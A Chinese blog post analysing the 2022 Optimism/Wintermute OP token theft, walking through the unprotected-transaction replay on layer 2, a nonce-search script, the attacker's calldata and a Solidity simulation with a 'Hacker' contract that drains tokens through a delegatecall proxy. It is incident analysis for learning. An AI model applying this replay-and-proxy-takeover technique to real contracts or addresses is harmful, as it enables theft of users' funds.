<!DOCTYPE html>


<html lang="zh-CN">
  

    <head>
      <meta charset="utf-8" />
       
      <meta name="keywords" content="blog" />
       
      <meta name="description" content="yqq" />
      
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>深度解析Optimism窃取事件 |  yqq&#39;s blog</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css"
      />
      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
       
 

      <!-- mermaid -->
      
      <script src="https://cdn.jsdelivr.net/npm/mermaid@11.2.1/dist/mermaid.min.js"></script>
      
    </head>
  </html>
</html>


<body>
  <div id="app">
    
      
      <canvas width="1777" height="841"
        style="position: fixed; left: 0px; top: 0px; z-index: 99999; pointer-events: none;"></canvas>
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-technology/blockchain/web3/深度解析Optimism窃取事件"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  深度解析Optimism窃取事件
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2022/06/10/technology/blockchain/web3/%E6%B7%B1%E5%BA%A6%E8%A7%A3%E6%9E%90Optimism%E7%AA%83%E5%8F%96%E4%BA%8B%E4%BB%B6/" class="article-date">
  <time datetime="2022-06-10T03:55:00.000Z" itemprop="datePublished">2022-06-10</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%8A%80%E6%9C%AF/">技术</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">2.3k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">10 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="深度解析Optimism窃取事件"><a href="#深度解析Optimism窃取事件" class="headerlink" title="深度解析Optimism窃取事件"></a>深度解析Optimism窃取事件</h1><p>本文在这篇文章<a target="_blank" rel="noopener" href="https://www.techflow520.com/news/920">深度解析 Optimism窃取事件：Layer2 网络合约部署重放攻击</a>加以梳理，并配有详细的示例代码，示例代码会放在github上。</p>
<h2 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h2><p>为了简化，就用甲方乙代替公司名吧。甲方（optimism）要乙方（Wintermute）帮忙搞事情，因为乙在layer1玩得很溜，甲方想在自己的layer2也玩起来。</p>
<p>于是，乙方爽快地答应了，给了一个收币地址给甲方说：“你忘这个地址上转币吧，其他事情我这边搞定。”甲方很开心地向乙方提供的收币地址转了2000万个OP币，乙方却说没有收到。一查才发现，乙方提供的是layer1的地址，而甲方转的是layer2的地址，虽然地址长得一样，但是此地址在layer2上尚未被创建（没有创建也可以转账进去）。</p>
<p>那该怎么办呢？两边的技术人员一看说，这是个黑洞地址，现在没有人能转走里面的币，只要操作一波是可以找回那些币的，不过现在是五一假期，大家都在夏威夷独家呢，过了五一节再说吧（开玩笑）。黑客可没有五一，立即行动，搞走了里面的币。甲乙双方尴尬了。</p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>黑客是做到的呢？ 思路很简单，只要2步：</p>
<ul>
<li>在layer2上创建乙方的收币地址（是合约地址）</li>
<li>搞到乙方的收币地址的所有权（控制权），因为地址是合约地址，而且是个proxy合约，即代理合约。</li>
<li>转移资金</li>
</ul>
<h2 id="Layer1"><a href="#Layer1" class="headerlink" title="Layer1"></a>Layer1</h2><ul>
<li>Gnosis Safe Proxy Factory（以下统称合约A): 0x76e2cfc1f5fa8f6a5b3fc4c8f4788f0116861f9b</li>
<li>Wintermute proxy(以下统称合约B): 0x4f3a120E72C76c22ae802D129F599BFDbc31cb81</li>
</ul>
<p>其中合约A由此交易创建:<a target="_blank" rel="noopener" href="https://etherscan.io/tx/0x75a42f240d229518979199f56cd7c82e4fc1f1a20ad9a4864c635354b4a34261">https://etherscan.io/tx/0x75a42f240d229518979199f56cd7c82e4fc1f1a20ad9a4864c635354b4a34261</a><br>这笔交易的发起地址是：0x1aa7451dd11b8cb16ac089ed7fe05efa00100a6a</p>
<p><img src="https://raw.githubusercontent.com/youngqqcn/repo4picgo/master/img2022-06-10-002.png"></p>
<p>合约B由此交易创建：<a target="_blank" rel="noopener" href="https://etherscan.io/tx/0xd705178d68551a6a6f65ca74363264b32150857a26dd62c27f3f96b8ec69ca01#eventlog">https://etherscan.io/tx/0xd705178d68551a6a6f65ca74363264b32150857a26dd62c27f3f96b8ec69ca01#eventlog</a></p>
<p>这笔交易的发起者不重要，重要的是调用ProxyCreation传入的参数，0x76e2cfc1f5fa8f6a5b3fc4c8f4788f0116861f9b，这个地址就是合约A<br><img src="https://raw.githubusercontent.com/youngqqcn/repo4picgo/master/img2022-06-10-001.png"></p>
<h2 id="Layer2"><a href="#Layer2" class="headerlink" title="Layer2"></a>Layer2</h2><ul>
<li>合约地址A：0x76e2cfc1f5fa8f6a5b3fc4c8f4788f0116861f9b</li>
<li>合约地址B：0x4f3a120e72c76c22ae802d129f599bfdbc31cb81 </li>
</ul>
<p><a target="_blank" rel="noopener" href="https://etherscan.io/txs?a=0x1aa7451dd11b8cb16ac089ed7fe05efa00100a6a">https://etherscan.io/txs?a=0x1aa7451dd11b8cb16ac089ed7fe05efa00100a6a</a></p>
<h3 id="⭐-第1步：如何在layer2创建处合约地址A？"><a href="#⭐-第1步：如何在layer2创建处合约地址A？" class="headerlink" title="⭐ 第1步：如何在layer2创建处合约地址A？"></a>⭐ 第1步：如何在layer2创建处合约地址A？</h3><p>因为layer1上创建合约A的交易，没有使用<a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/eips/eip-155.html#%E8%A7%84%E8%8C%83">EIP155</a>,所以可以，将此笔交易进行重放。</p>
<p>重放layer1上创建合约A的交易：<a target="_blank" rel="noopener" href="https://optimistic.etherscan.io/tx/0x75a42f240d229518979199f56cd7c82e4fc1f1a20ad9a4864c635354b4a34261">https://optimistic.etherscan.io/tx/0x75a42f240d229518979199f56cd7c82e4fc1f1a20ad9a4864c635354b4a34261</a><br>，保证发送笔交易时nonce与layer创建合约A时一样即可。</p>
<p>如何重放？ 可以使用RPC <code>sendRawTransaction</code>将交易data发到layer2链上即可，当然要保证账户有余额</p>
<h3 id="⭐-第2步：如何在layer2创建处合约地址B？"><a href="#⭐-第2步：如何在layer2创建处合约地址B？" class="headerlink" title="⭐ 第2步：如何在layer2创建处合约地址B？"></a>⭐ 第2步：如何在layer2创建处合约地址B？</h3><p>合约地址生成原理: <code>Hash(caller, nonce_of_caller)</code></p>
<p>普通地址的nonce记录的交易次数，合约地址的nonce值是合约地址创建合约数量。nonce值可以以太坊的JSON RPC接口获取</p>
<p>例如获取当前的nonce值</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">curl https://mainnet.infura.io/v3/8a264f274fd94de48eb290d35db030ab \</span><br><span class="line">-X POST \</span><br><span class="line">-H &quot;Content-Type: application/json&quot; \</span><br><span class="line">-d \</span><br><span class="line">&#x27;&#123;</span><br><span class="line">    &quot;jsonrpc&quot;: &quot;2.0&quot;,</span><br><span class="line">    &quot;method&quot;: &quot;eth_getTransactionCount&quot;,</span><br><span class="line">    &quot;params&quot;: [</span><br><span class="line">        &quot;0x76e2cfc1f5fa8f6a5b3fc4c8f4788f0116861f9b&quot;,</span><br><span class="line">        &quot;latest&quot; </span><br><span class="line">    ],</span><br><span class="line">    &quot;id&quot;: 1</span><br><span class="line">&#125;&#x27;</span><br></pre></td></tr></table></figure>
<p>输出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;jsonrpc&quot;:&quot;2.0&quot;,&quot;id&quot;:1,&quot;result&quot;:&quot;0x89a7&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>其中，<code>0x89a7</code>是<code>35239</code>，黑客是不是要创建这么多合约呢？其实不用，因为layer1上的合约B是2020年创建的，那时候合约A的nonce肯定没有这么大。有没有什么办法可以获取到那笔创建合约B时，合约A的准确的nonce值呢？有的！etherscan就记录了state的转换：<a target="_blank" rel="noopener" href="https://etherscan.io/tx/0xd705178d68551a6a6f65ca74363264b32150857a26dd62c27f3f96b8ec69ca01#statechange">https://etherscan.io/tx/0xd705178d68551a6a6f65ca74363264b32150857a26dd62c27f3f96b8ec69ca01#statechange</a></p>
<p><img src="https://raw.githubusercontent.com/youngqqcn/repo4picgo/master/img2022-06-10-003.png"></p>
<p>nonce从<code>8884</code>增加到了<code>8885</code>，也就说，我们要得到的nonce值就是<code>8884</code>！</p>
<p>当然也可以使用以下代码找到nonce值：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> Web3 = <span class="built_in">require</span>(<span class="string">&quot;web3&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> RLP = <span class="built_in">require</span>(<span class="string">&quot;rlp&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> account = <span class="string">&quot;0x76e2cfc1f5fa8f6a5b3fc4c8f4788f0116861f9b&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> nonce = <span class="number">0</span>; nonce &lt; <span class="number">0xffffffff</span>; nonce++)&#123;</span><br><span class="line">    <span class="keyword">let</span> e = RLP.encode([account, nonce] );</span><br><span class="line">    <span class="keyword">const</span> nonceHash = Web3.utils.sha3(Buffer.from(e));</span><br><span class="line">    <span class="keyword">const</span> targetAddress = <span class="string">&#x27;0x&#x27;</span>+ nonceHash.substring(<span class="number">26</span>)</span><br><span class="line">    <span class="keyword">if</span>(targetAddress === <span class="string">&#x27;0x4f3a120e72c76c22ae802d129f599bfdbc31cb81&#x27;</span>) &#123;</span><br><span class="line">        <span class="built_in">console</span>.log(nonce)</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>输出结果是:<code>8884</code></p>
<p>黑客创建了一个攻击合约（以下称作合约C）：0xE7145dd6287AE53326347f3A6694fCf2954bcD8A</p>
<p>只要调用合约A不停地创建合约，当nonce与layer1创建合约B那笔交易的nonce相同，就可以在layer2创建出合约地址B。</p>
<p>黑客在layer2上创建合约B地址的交易log，在135位置：<a target="_blank" rel="noopener" href="https://optimistic.etherscan.io/tx/0x00a3da68f0f6a69cb067f09c3f7e741a01636cbc27a84c603b468f65271d415b#eventlog">https://optimistic.etherscan.io/tx/0x00a3da68f0f6a69cb067f09c3f7e741a01636cbc27a84c603b468f65271d415b#eventlog</a></p>
<p><img src="https://raw.githubusercontent.com/youngqqcn/repo4picgo/master/img2022-06-10-004.png"></p>
<p>黑客是如何将合约B中的<code>masterCopy</code>设置为自己的攻击合约地址的？</p>
<p>在区块浏览器查不到合约B的构造参数，但是我们看合约A的代码 <a target="_blank" rel="noopener" href="https://optimistic.etherscan.io/address/0x76e2cfc1f5fa8f6a5b3fc4c8f4788f0116861f9b#code%EF%BC%9A">https://optimistic.etherscan.io/address/0x76e2cfc1f5fa8f6a5b3fc4c8f4788f0116861f9b#code：</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&#x2F;&#x2F;&#x2F; @dev Allows to create new proxy contact and execute a message call to the new proxy within one transaction.</span><br><span class="line">&#x2F;&#x2F;&#x2F; @param masterCopy Address of master copy.</span><br><span class="line">&#x2F;&#x2F;&#x2F; @param data Payload for message call sent to new proxy contract.</span><br><span class="line">function createProxy(address masterCopy, bytes memory data)</span><br><span class="line">    public</span><br><span class="line">    returns (Proxy proxy)</span><br><span class="line">&#123;</span><br><span class="line">    proxy &#x3D; new Proxy(masterCopy);</span><br><span class="line">    if (data.length &gt; 0)</span><br><span class="line">        &#x2F;&#x2F; solium-disable-next-line security&#x2F;no-inline-assembly</span><br><span class="line">        assembly &#123;</span><br><span class="line">            if eq(call(gas, proxy, 0, add(data, 0x20), mload(data), 0, 0), 0) &#123; revert(0, 0) &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    emit ProxyCreation(proxy);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>只要在调用<code>createProxy</code>时将<code>masterCopy</code>设置为黑客自己的攻击合约地址即可，<code>data</code>为空，这样即可。</p>
<h3 id="⭐-第3步：如何转移合约B中的金额？"><a href="#⭐-第3步：如何转移合约B中的金额？" class="headerlink" title="⭐ 第3步：如何转移合约B中的金额？"></a>⭐ 第3步：如何转移合约B中的金额？</h3><p>黑客转移合约B上的1000000个OP的交易：<a target="_blank" rel="noopener" href="https://optimistic.etherscan.io/tx/0x230e17117986f0dc7259db824de1d00c6cf455c925c0c8c6b89bf0b6756a7b7e">https://optimistic.etherscan.io/tx/0x230e17117986f0dc7259db824de1d00c6cf455c925c0c8c6b89bf0b6756a7b7e</a></p>
<p>查看内部交易：<a target="_blank" rel="noopener" href="https://optimistic.etherscan.io/tx/0x230e17117986f0dc7259db824de1d00c6cf455c925c0c8c6b89bf0b6756a7b7e#internal">https://optimistic.etherscan.io/tx/0x230e17117986f0dc7259db824de1d00c6cf455c925c0c8c6b89bf0b6756a7b7e#internal</a></p>
<p><img src="https://raw.githubusercontent.com/youngqqcn/repo4picgo/master/img2022-06-10-005.png"></p>
<p>其中 0xE7145dd6287AE53326347f3A6694fCf2954bcD8A 就是黑客攻击合约</p>
<p>交易的inputData</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0xad8d5f480000000000000000000000004200000000000000000000000000000000000042000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044a9059cbb00000000000000000000000060b28637879b5a09d21b68040020ffbf7dba510700000000000000000000000000000000000000000000d3c21bcecceda100000000000000000000000000000000000000000000000000000000000000</span><br></pre></td></tr></table></figure>


<p>其中 <code>0xad8d5f48</code>: 是<code>exec(address,bytes,uint256)</code>的签名</p>
<p>我们再看看layer1上合约B的源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">contract Proxy &#123;</span><br><span class="line"></span><br><span class="line">    &#x2F;&#x2F; masterCopy always needs to be first declared variable, to ensure that it is at the same location in the contracts to which calls are delegated.</span><br><span class="line">    &#x2F;&#x2F; To reduce deployment costs this variable is internal and needs to be retrieved via &#96;getStorageAt&#96;</span><br><span class="line">    address internal masterCopy;</span><br><span class="line"></span><br><span class="line">    &#x2F;&#x2F;&#x2F; @dev Constructor function sets address of master copy contract.</span><br><span class="line">    &#x2F;&#x2F;&#x2F; @param _masterCopy Master copy address.</span><br><span class="line">    constructor(address _masterCopy)</span><br><span class="line">        public</span><br><span class="line">    &#123;</span><br><span class="line">        require(_masterCopy !&#x3D; address(0), &quot;Invalid master copy address provided&quot;);</span><br><span class="line">        masterCopy &#x3D; _masterCopy;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    &#x2F;&#x2F;&#x2F; @dev Fallback function forwards all transactions and returns all received return data.</span><br><span class="line">    function ()</span><br><span class="line">        external</span><br><span class="line">        payable</span><br><span class="line">    &#123;</span><br><span class="line">        &#x2F;&#x2F; solium-disable-next-line security&#x2F;no-inline-assembly</span><br><span class="line">        assembly &#123;</span><br><span class="line">            let masterCopy :&#x3D; and(sload(0), 0xffffffffffffffffffffffffffffffffffffffff)</span><br><span class="line">            &#x2F;&#x2F; 0xa619486e &#x3D;&#x3D; keccak(&quot;masterCopy()&quot;). The value is right padded to 32-bytes with 0s</span><br><span class="line">            if eq(calldataload(0), 0xa619486e00000000000000000000000000000000000000000000000000000000) &#123;</span><br><span class="line">                mstore(0, masterCopy)</span><br><span class="line">                return(0, 0x20)</span><br><span class="line">            &#125;</span><br><span class="line">            calldatacopy(0, 0, calldatasize())</span><br><span class="line">            let success :&#x3D; delegatecall(gas, masterCopy, 0, calldatasize(), 0, 0)</span><br><span class="line">            returndatacopy(0, 0, returndatasize())</span><br><span class="line">            if eq(success, 0) &#123; revert(0, returndatasize()) &#125;</span><br><span class="line">            return(0, returndatasize())</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>问题来了，并没有发现<code>exec</code>函数！这是怎么回事呢？</p>
<p>我们注意到，函数<code>function () external payable</code>是<code>fallback函数</code>，也就是说当调用时没有匹配到函数时，会进入<code>fallback</code>函数。</p>
<p>因为<code>masterCopy</code>在创建合约B时，就已经设置为黑客自己的攻击合约地址<code>0xE7145dd6287AE53326347f3A6694fCf2954bcD8A</code>。</p>
<p>如此一来，代码中的<code>delegatecall</code>调用黑客自己的攻击合约，然后在攻击合约中执行<code>OP</code>合约(<code>0x4200000000000000000000000000000000000042</code>)的ERC20的<code>transfer</code>操作，又因为使用的是<code>delegatecall</code>，<code>msg.sender</code>就是合约B的地址，即(0x4f3a120e72c76c22ae802d129f599bfdbc31cb81)，所以，调用<code>transfer</code>时，扣除的<code>msg.sender</code>的OP代币余额，这样，就可以转移了<code>OP</code>代币。</p>
<p>我们再验证这个合约B的“转发”功能，</p>
<p><img src="https://raw.githubusercontent.com/youngqqcn/repo4picgo/master/img2022-06-11-001.png"></p>
<p>其中<code>0x8da5cb5b</code>是函数<code>owner()</code>的签名。合约B<code>0x4f3a120e72c76c22ae802d129f599bfdbc31cb81</code>将请求转发到黑客的攻击合约，如下图：</p>
<p><img src="https://raw.githubusercontent.com/youngqqcn/repo4picgo/master/img2022-06-11-002.png"></p>
<h3 id="模拟转移代币"><a href="#模拟转移代币" class="headerlink" title="模拟转移代币"></a>模拟转移代币</h3><p>为了更加深入理解，我们编写一个测试合约，来模拟黑客转移代币的操作。</p>
<ul>
<li>我们把<code>proxy</code>的代码复制过来；</li>
<li>然后编写一个<code>Erc20</code>合约模拟<code>OP</code>代币合约，秩序实现一个简单的<code>transfer</code>操作；</li>
<li>再编写一个<code>Hacker</code>合约，模拟黑客的攻击合约</li>
</ul>
<p>代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.26;</span><br><span class="line"></span><br><span class="line">contract Proxy &#123;</span><br><span class="line"></span><br><span class="line">    address internal masterCopy;</span><br><span class="line">    constructor(address _masterCopy)</span><br><span class="line">        public</span><br><span class="line">    &#123;</span><br><span class="line">        require(_masterCopy !&#x3D; address(0), &quot;Invalid master copy address provided&quot;);</span><br><span class="line">        masterCopy &#x3D; _masterCopy;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    &#x2F;&#x2F;&#x2F; @dev Fallback function forwards all transactions and returns all received return data.</span><br><span class="line">    function ()</span><br><span class="line">        external</span><br><span class="line">        payable</span><br><span class="line">    &#123;</span><br><span class="line">        &#x2F;&#x2F; solium-disable-next-line security&#x2F;no-inline-assembly</span><br><span class="line">        assembly &#123;</span><br><span class="line">            let masterCopy :&#x3D; and(sload(0), 0xffffffffffffffffffffffffffffffffffffffff)</span><br><span class="line">            &#x2F;&#x2F; 0xa619486e &#x3D;&#x3D; keccak(&quot;masterCopy()&quot;). The value is right padded to 32-bytes with 0s</span><br><span class="line">            if eq(calldataload(0), 0xa619486e00000000000000000000000000000000000000000000000000000000) &#123;</span><br><span class="line">                mstore(0, masterCopy)</span><br><span class="line">                return(0, 0x20)</span><br><span class="line">            &#125;</span><br><span class="line">            calldatacopy(0, 0, calldatasize())</span><br><span class="line">            let success :&#x3D; delegatecall(gas, masterCopy, 0, calldatasize(), 0, 0)</span><br><span class="line">            returndatacopy(0, 0, returndatasize())</span><br><span class="line">            if eq(success, 0) &#123; revert(0, returndatasize()) &#125;</span><br><span class="line">            return(0, returndatasize())</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">contract Erc20 &#123;</span><br><span class="line">    address public sender;</span><br><span class="line">    &#x2F;&#x2F; 为了方便查看结果，我们输出一个log</span><br><span class="line">    event Transfer(address indexed from, address indexed to, uint256 value);</span><br><span class="line">    function transfer(address to, uint256 amount) external returns (bool) &#123;</span><br><span class="line">        sender &#x3D; msg.sender;</span><br><span class="line">        &#x2F;&#x2F; 略，其他操作，从msg.sender余额扣除，增加to的余额</span><br><span class="line">        emit Transfer(msg.sender, to, amount);</span><br><span class="line">        return true;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">contract Hacker &#123;</span><br><span class="line">    event Ok(address,bytes,uint256);</span><br><span class="line">    event Failed(bool);</span><br><span class="line"></span><br><span class="line">    function exec(address addr, bytes data, uint256 amount)  public payable returns(bool)&#123;</span><br><span class="line">        Erc20 erc20 &#x3D; Erc20(addr);</span><br><span class="line">        address to &#x3D; 0xFFfFfFffFFfffFFfFFfFFFFFffFFFffffFfFFFfF;</span><br><span class="line">        assembly &#123;</span><br><span class="line">            to :&#x3D; mload(add(data,20)) &#x2F;&#x2F; 将data转为地址</span><br><span class="line">        &#125;</span><br><span class="line">        bool success &#x3D; erc20.transfer(to, amount);</span><br><span class="line">        if(success) &#123;</span><br><span class="line">            &#x2F;&#x2F; 为了方便查看结果，我们输出一个log</span><br><span class="line">            emit Ok(addr, data, amount);</span><br><span class="line">            return true;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            &#x2F;&#x2F; 为了方便查看结果，我们输出一个log</span><br><span class="line">            emit Failed(false);</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;   </span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<p>具体部署步骤:</p>
<ul>
<li>部署<code>Erc20</code>合约</li>
<li>部署<code>Hacker</code>合约</li>
<li>部署<code>proxy</code>合约，构造参数将<code>masterCopy</code>地址设置<code>Hacker</code>合约地址即可</li>
</ul>
<p>为了获得proxy的调用data，我们这里先直接调用<code>Hacker</code>的<code>exec</code>函数，这样就可以获得完整的input data</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0xad8d5f4800000000000000000000000032f99155646d147b8a4846470b64a96dd9cba4140000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000115c000000000000000000000000000000000000000000000000000000000000001460b28637879b5a09d21b68040020ffbf7dba5107000000000000000000000000</span><br></pre></td></tr></table></figure>
<p>我们将此input data 填入<code>proxy</code>的CALLDATA，就可以调用proxy的<code>fallback</code>函数，运行结果如下：</p>
<p><img src="https://raw.githubusercontent.com/youngqqcn/repo4picgo/master/img2022-06-12-001.png"></p>
<p>至此，我们这个分析流程结束。</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>山外有山，人外有人。应该向黑客学习，学习他的好的一面，比如，技术方面、耐心。</p>
<hr>
<p>示例代码链接：<a target="_blank" rel="noopener" href="https://github.com/youngqqcn/optimism-attack-analysis">https://github.com/youngqqcn/optimism-attack-analysis</a></p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2022/06/10/technology/blockchain/web3/%E6%B7%B1%E5%BA%A6%E8%A7%A3%E6%9E%90Optimism%E7%AA%83%E5%8F%96%E4%BA%8B%E4%BB%B6/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Optimism/" rel="tag">Optimism</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web3/" rel="tag">Web3</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/solidity/" rel="tag">solidity</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AD%A6%E4%B9%A0/" rel="tag">学习</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E9%BB%91%E5%AE%A2/" rel="tag">黑客</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2022/09/12/learning/9-12%E6%9C%88%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            2022技术学习
          
